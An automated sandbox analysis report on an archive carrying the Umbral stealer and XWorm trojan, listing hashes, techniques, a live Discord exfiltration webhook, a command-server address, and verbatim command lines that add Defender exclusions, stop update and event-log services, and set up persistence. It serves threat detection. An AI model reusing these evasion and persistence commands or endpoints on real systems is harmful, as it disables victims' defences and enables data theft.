umbral | 04068c986e06f0da3def4cc67df86a0ec76f6e324a99e9ebf23687c21645666a

Analysis

max time kernel
147s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
15-03-2024 21:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ToxicProject.rar
Size

14.0MB
MD5

95bb733df03eaf9a2d455450ee4003e8
SHA1

1d6c18f2ec5501a01cf39faf9230aaa28c6db8f8
SHA256

04068c986e06f0da3def4cc67df86a0ec76f6e324a99e9ebf23687c21645666a
SHA512

c55d16e31b5124fc28d63b49ec6445b6a89623e9e70305156fbc1c7439f4e0e50b0e7c46bf45bb1460609cd999048a868b1e6a4d1c8d101009e8a7134d217b84
SSDEEP

196608:Znw75pSvvDy2bpmAa72xIvRt5snPdFK5Jdr9hj+i4etUqUFc/muT8EgJHZtmi8:ZwCXbi7EIvRmPdFIhjF4eGnuT4DmB

Score

10^/10

umbral xworm evasion persistence rat stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1218255752314097764/pf1l_fyX4Y944q-tMNsmbSq2cfDBpqCBXuTvF0vyF76tkTcn3FOYasjrq_iM6NffJOYF

Extracted

Family

xworm

approved-supports.gl.at.ply.gg:45098

Attributes

Install_directory
%AppData%
install_file
rat.exe

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x00060000000231f6-50.dat	family_umbral
behavioral2/memory/4308-54-0x0000028418410000-0x0000028418450000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x00060000000231f5-35.dat	family_xworm
behavioral2/memory/4552-55-0x0000000000DE0000-0x0000000000DF8000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	OneCoreUAPCommonProxyStub.exe
File created	C:\Windows\system32\drivers\etc\hosts	rykmnxwyylqw.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation	ToxicProject.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation	pautoenr.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rat.lnk	pautoenr.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rat.lnk	pautoenr.exe

Executes dropped EXE 9 IoCs

pid	Process
2636	ToxicProject.exe
1524	nvdebugdump.exe
2904	OneCoreUAPCommonProxyStub.exe
4308	PeerDistAD.exe
4552	pautoenr.exe
3588	rykmnxwyylqw.exe
2852	rat.exe
3396	rfpqch.exe
4444	rat.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rat = "C:\\Users\\Admin\\AppData\\Roaming\\rat.exe"	pautoenr.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
42	ip-api.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	OneCoreUAPCommonProxyStub.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	rykmnxwyylqw.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1524	nvdebugdump.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3588 set thread context of 3852	3588	rykmnxwyylqw.exe	172

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3424	sc.exe
2032	sc.exe
1648	sc.exe
4448	sc.exe
2608	sc.exe
728	sc.exe
1768	sc.exe
1280	sc.exe
2728	sc.exe
2012	sc.exe
1940	sc.exe
4080	sc.exe
4944	sc.exe
4388	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2336	schtasks.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4288	7zFM.exe
4288	7zFM.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe
1524	nvdebugdump.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4288	7zFM.exe
1524	nvdebugdump.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4288	7zFM.exe
Token: 35	4288	7zFM.exe
Token: SeSecurityPrivilege	4288	7zFM.exe
Token: SeDebugPrivilege	4552	pautoenr.exe
Token: SeDebugPrivilege	4308	PeerDistAD.exe
Token: SeIncreaseQuotaPrivilege	3500	wmic.exe
Token: SeSecurityPrivilege	3500	wmic.exe
Token: SeTakeOwnershipPrivilege	3500	wmic.exe
Token: SeLoadDriverPrivilege	3500	wmic.exe
Token: SeSystemProfilePrivilege	3500	wmic.exe
Token: SeSystemtimePrivilege	3500	wmic.exe
Token: SeProfSingleProcessPrivilege	3500	wmic.exe
Token: SeIncBasePriorityPrivilege	3500	wmic.exe
Token: SeCreatePagefilePrivilege	3500	wmic.exe
Token: SeBackupPrivilege	3500	wmic.exe
Token: SeRestorePrivilege	3500	wmic.exe
Token: SeShutdownPrivilege	3500	wmic.exe
Token: SeDebugPrivilege	3500	wmic.exe
Token: SeSystemEnvironmentPrivilege	3500	wmic.exe
Token: SeRemoteShutdownPrivilege	3500	wmic.exe
Token: SeUndockPrivilege	3500	wmic.exe
Token: SeManageVolumePrivilege	3500	wmic.exe
Token: 33	3500	wmic.exe
Token: 34	3500	wmic.exe
Token: 35	3500	wmic.exe
Token: 36	3500	wmic.exe
Token: SeIncreaseQuotaPrivilege	3500	wmic.exe
Token: SeSecurityPrivilege	3500	wmic.exe
Token: SeTakeOwnershipPrivilege	3500	wmic.exe
Token: SeLoadDriverPrivilege	3500	wmic.exe
Token: SeSystemProfilePrivilege	3500	wmic.exe
Token: SeSystemtimePrivilege	3500	wmic.exe
Token: SeProfSingleProcessPrivilege	3500	wmic.exe
Token: SeIncBasePriorityPrivilege	3500	wmic.exe
Token: SeCreatePagefilePrivilege	3500	wmic.exe
Token: SeBackupPrivilege	3500	wmic.exe
Token: SeRestorePrivilege	3500	wmic.exe
Token: SeShutdownPrivilege	3500	wmic.exe
Token: SeDebugPrivilege	3500	wmic.exe
Token: SeSystemEnvironmentPrivilege	3500	wmic.exe
Token: SeRemoteShutdownPrivilege	3500	wmic.exe
Token: SeUndockPrivilege	3500	wmic.exe
Token: SeManageVolumePrivilege	3500	wmic.exe
Token: 33	3500	wmic.exe
Token: 34	3500	wmic.exe
Token: 35	3500	wmic.exe
Token: 36	3500	wmic.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	3548	powershell.exe
Token: SeDebugPrivilege	624	powershell.exe
Token: SeDebugPrivilege	4904	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	2904	OneCoreUAPCommonProxyStub.exe
Token: SeShutdownPrivilege	5048	powercfg.exe
Token: SeCreatePagefilePrivilege	5048	powercfg.exe
Token: SeShutdownPrivilege	1136	powercfg.exe
Token: SeCreatePagefilePrivilege	1136	powercfg.exe
Token: SeShutdownPrivilege	1780	powercfg.exe
Token: SeCreatePagefilePrivilege	1780	powercfg.exe
Token: SeShutdownPrivilege	4264	powercfg.exe
Token: SeCreatePagefilePrivilege	4264	powercfg.exe
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeDebugPrivilege	4552	pautoenr.exe
Token: SeDebugPrivilege	3588	rykmnxwyylqw.exe

Suspicious use of FindShellTrayWindow 10 IoCs

pid	Process
4288	7zFM.exe
4288	7zFM.exe
4080	firefox.exe
4080	firefox.exe
4080	firefox.exe
4080	firefox.exe
4080	firefox.exe
4080	firefox.exe
4080	firefox.exe
4080	firefox.exe

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
4080	firefox.exe
4080	firefox.exe
4080	firefox.exe
4080	firefox.exe
4080	firefox.exe
4080	firefox.exe
4080	firefox.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4552	pautoenr.exe
4080	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4556 wrote to memory of 4288	4556	cmd.exe	86
PID 4556 wrote to memory of 4288	4556	cmd.exe	86
PID 4288 wrote to memory of 2636	4288	7zFM.exe	93
PID 4288 wrote to memory of 2636	4288	7zFM.exe	93
PID 2636 wrote to memory of 1524	2636	ToxicProject.exe	95
PID 2636 wrote to memory of 1524	2636	ToxicProject.exe	95
PID 2636 wrote to memory of 2904	2636	ToxicProject.exe	96
PID 2636 wrote to memory of 2904	2636	ToxicProject.exe	96
PID 2636 wrote to memory of 4552	2636	ToxicProject.exe	97
PID 2636 wrote to memory of 4552	2636	ToxicProject.exe	97
PID 2636 wrote to memory of 4308	2636	ToxicProject.exe	98
PID 2636 wrote to memory of 4308	2636	ToxicProject.exe	98
PID 4308 wrote to memory of 3500	4308	PeerDistAD.exe	101
PID 4308 wrote to memory of 3500	4308	PeerDistAD.exe	101
PID 1524 wrote to memory of 1224	1524	nvdebugdump.exe	103
PID 1524 wrote to memory of 1224	1524	nvdebugdump.exe	103
PID 1224 wrote to memory of 4368	1224	cmd.exe	105
PID 1224 wrote to memory of 4368	1224	cmd.exe	105
PID 1224 wrote to memory of 4648	1224	cmd.exe	106
PID 1224 wrote to memory of 4648	1224	cmd.exe	106
PID 1224 wrote to memory of 1676	1224	cmd.exe	107
PID 1224 wrote to memory of 1676	1224	cmd.exe	107
PID 4552 wrote to memory of 1604	4552	pautoenr.exe	108
PID 4552 wrote to memory of 1604	4552	pautoenr.exe	108
PID 4552 wrote to memory of 3548	4552	pautoenr.exe	110
PID 4552 wrote to memory of 3548	4552	pautoenr.exe	110
PID 4552 wrote to memory of 624	4552	pautoenr.exe	112
PID 4552 wrote to memory of 624	4552	pautoenr.exe	112
PID 4552 wrote to memory of 4904	4552	pautoenr.exe	114
PID 4552 wrote to memory of 4904	4552	pautoenr.exe	114
PID 2228 wrote to memory of 2844	2228	cmd.exe	122
PID 2228 wrote to memory of 2844	2228	cmd.exe	122
PID 4552 wrote to memory of 2336	4552	pautoenr.exe	150
PID 4552 wrote to memory of 2336	4552	pautoenr.exe	150
PID 4660 wrote to memory of 4516	4660	cmd.exe	156
PID 4660 wrote to memory of 4516	4660	cmd.exe	156
PID 3588 wrote to memory of 3852	3588	rykmnxwyylqw.exe	172
PID 3588 wrote to memory of 3852	3588	rykmnxwyylqw.exe	172
PID 3588 wrote to memory of 3852	3588	rykmnxwyylqw.exe	172
PID 3588 wrote to memory of 3852	3588	rykmnxwyylqw.exe	172
PID 3588 wrote to memory of 3852	3588	rykmnxwyylqw.exe	172
PID 3588 wrote to memory of 3852	3588	rykmnxwyylqw.exe	172
PID 3588 wrote to memory of 3852	3588	rykmnxwyylqw.exe	172
PID 3588 wrote to memory of 3852	3588	rykmnxwyylqw.exe	172
PID 3588 wrote to memory of 3852	3588	rykmnxwyylqw.exe	172
PID 4552 wrote to memory of 3396	4552	pautoenr.exe	176
PID 4552 wrote to memory of 3396	4552	pautoenr.exe	176
PID 3396 wrote to memory of 4012	3396	rfpqch.exe	177
PID 3396 wrote to memory of 4012	3396	rfpqch.exe	177
PID 4200 wrote to memory of 4080	4200	firefox.exe	180
PID 4200 wrote to memory of 4080	4200	firefox.exe	180
PID 4200 wrote to memory of 4080	4200	firefox.exe	180
PID 4200 wrote to memory of 4080	4200	firefox.exe	180
PID 4200 wrote to memory of 4080	4200	firefox.exe	180
PID 4200 wrote to memory of 4080	4200	firefox.exe	180
PID 4200 wrote to memory of 4080	4200	firefox.exe	180
PID 4200 wrote to memory of 4080	4200	firefox.exe	180
PID 4200 wrote to memory of 4080	4200	firefox.exe	180
PID 4200 wrote to memory of 4080	4200	firefox.exe	180
PID 4200 wrote to memory of 4080	4200	firefox.exe	180
PID 4080 wrote to memory of 5048	4080	firefox.exe	181
PID 4080 wrote to memory of 5048	4080	firefox.exe	181
PID 4080 wrote to memory of 2400	4080	firefox.exe	182
PID 4080 wrote to memory of 2400	4080	firefox.exe	182

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\ToxicProject.rar
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4556
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\ToxicProject.rar"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:4288
- - C:\Users\Admin\AppData\Local\Temp\7zO0C034D27\ToxicProject.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO0C034D27\ToxicProject.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2636
  - - C:\Users\Admin\AppData\Local\Temp\nvdebugdump.exe
      "C:\Users\Admin\AppData\Local\Temp\nvdebugdump.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of WriteProcessMemory
      PID:1524
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\nvdebugdump.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1224
      - C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\nvdebugdump.exe" MD5
        6⤵
        
        PID:4368
      - C:\Windows\system32\find.exe
        
        find /i /v "md5"
        6⤵
        
        PID:4648
      - C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        6⤵
        
        PID:1676
  - - C:\Users\Admin\AppData\Local\Temp\OneCoreUAPCommonProxyStub.exe
      "C:\Users\Admin\AppData\Local\Temp\OneCoreUAPCommonProxyStub.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      PID:2904
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2228
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:2844
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:728
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:2728
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:2608
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:4448
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:1648
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5048
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1136
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1780
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4264
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "CBABZYWT"
        5⤵
        Launches sc.exe
        
        PID:1768
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "CBABZYWT" binpath= "C:\ProgramData\yhdrdrurzmhh\rykmnxwyylqw.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:2032
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:3424
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "CBABZYWT"
        5⤵
        Launches sc.exe
        
        PID:1280
  - - C:\Users\Admin\AppData\Local\Temp\pautoenr.exe
      "C:\Users\Admin\AppData\Local\Temp\pautoenr.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\pautoenr.exe'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1604
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'pautoenr.exe'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3548
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\rat.exe'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:624
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rat.exe'
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4904
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "rat" /tr "C:\Users\Admin\AppData\Roaming\rat.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2336
    - - C:\Users\Admin\AppData\Local\Temp\rfpqch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rfpqch.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3396
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:4012
  - - C:\Users\Admin\AppData\Local\Temp\PeerDistAD.exe
      "C:\Users\Admin\AppData\Local\Temp\PeerDistAD.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4308
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3500

C:\ProgramData\yhdrdrurzmhh\rykmnxwyylqw.exe
C:\ProgramData\yhdrdrurzmhh\rykmnxwyylqw.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3588
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
